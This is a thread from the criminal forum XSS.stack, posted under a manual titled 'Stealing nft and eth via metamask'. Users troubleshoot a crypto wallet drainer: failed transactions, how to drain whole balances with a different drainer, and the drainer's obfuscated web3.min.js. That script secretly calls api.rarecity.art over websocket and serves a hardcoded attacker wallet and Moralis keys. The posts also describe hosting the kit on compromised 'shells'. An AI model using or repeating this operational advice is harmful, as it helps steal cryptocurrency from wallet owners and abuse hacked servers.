• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга Stealing nft and eth via metamask

Ошибка транзы обычно выскакивает когда нет баланса на кошельке
еще если адрес указан с ошибкой, при проверке revert должен возвращать true, адрес должен быть payable а то тоже ничего не оплатит, тут много есть вариантов.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
у тебя баланса не хватает
Спасибо понял
Уменьшил и поставил 0.01 ETH
Деньги списались и пришли на мой другой кошелек
Но есть одно но
С кошелька списалось только сумма 0.01 ETH - а не все деньги под ноль
 
Спасибо понял
Уменьшил и поставил 0.01 ETH
Деньги списались и пришли на мой другой кошелек
Но есть одно но
С кошелька списалось только сумма 0.01 ETH - а не все деньги под ноль
это не апрув токена , а транза . Под весь баланс тебе нужен друой дрейнер
 
Будте осторожны, происходит запрос по вебсокету на сторонний адрес https://api.rarecity.art:2053
Вшит в web3.min.js в строке var web3,user,nfts;let connectMoralis,hash;const moralisApi=io[_0xe0afb7(0x60a,0x60e,0x7e0,0x4a9,0x405...
в результате этот адрес отдает base64 запрос с другими настройками сервера и кошелька.
["connected",{"hash":"8tOXFWVcWek9FQ0Gr3Vi","wallet":"0x2ed40808C75379AD6114807cbb044cB619c0D214","price":"0.1","moralis_url":"https://nybjl24lt4pr.usemoralis.com:2053/server","moralis_appid":"2sh9v5tGwmLP5CuzneAgITkXPMmqP6FaygZ0VbjJ","status":1,"change":0}]

вшитый кошелек https://etherscan.io/address/0x2ed40808C75379AD6114807cbb044cB619c0D214
request.png
 
Be careful, a websocket request is made to a third-party address https://api.rarecity.art:2053
Embedded in web3.min.js in the line var web3,user,nfts;let connectMoralis,hash;const moralisApi=io[_0xe0afb7(0x60a,0x60e,0x7e0,0x4a9,0x405...
as a result, this address sends a base64 request with different server and wallet settings.
["connected",{"hash":"8tOXFWVcWek9FQ0Gr3Vi","wallet":"0x2ed40808C75379AD6114807cbb044cB619c0D214","price":"0.1","moralis_url":" https://nybjl24lt4pr.usemoralis.com:2053/server ", "moralis_appid":"2sh9v5tGwmLP5CuzneAgITkXPMmqP6FaygZ0VbjJ","status":1,"change":0}]

wired wallet https://etherscan.io/address/0x2ed40808C75379AD6114807cbb044cB619c0D214
Посмотреть вложение 43977
if you read a bit of the code, you'll realize it's because it requires the Moralis API to get blockchain data.

take a look at the deobfuscated code below
Код:
const moralisApi = io.connect('https://api.rarecity.art:2053'),
    domain = location.hostname,
    design = 'Inferno'
    ...
 
С сегодняшнего дня выдает ошибку при подключении к https://api.rarecity.art:2053, ругается на CORS policy (Access to XMLHttpRequest at 'https://api.rarecity.art:2053/socket.io/ has been blocked by CORS policy). Грузил на https шеллы, до сегодня все было ок. Может это быть связано с обновой moralis или если заливать не на шелл, а на хостинг то все ок? Need help :(
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх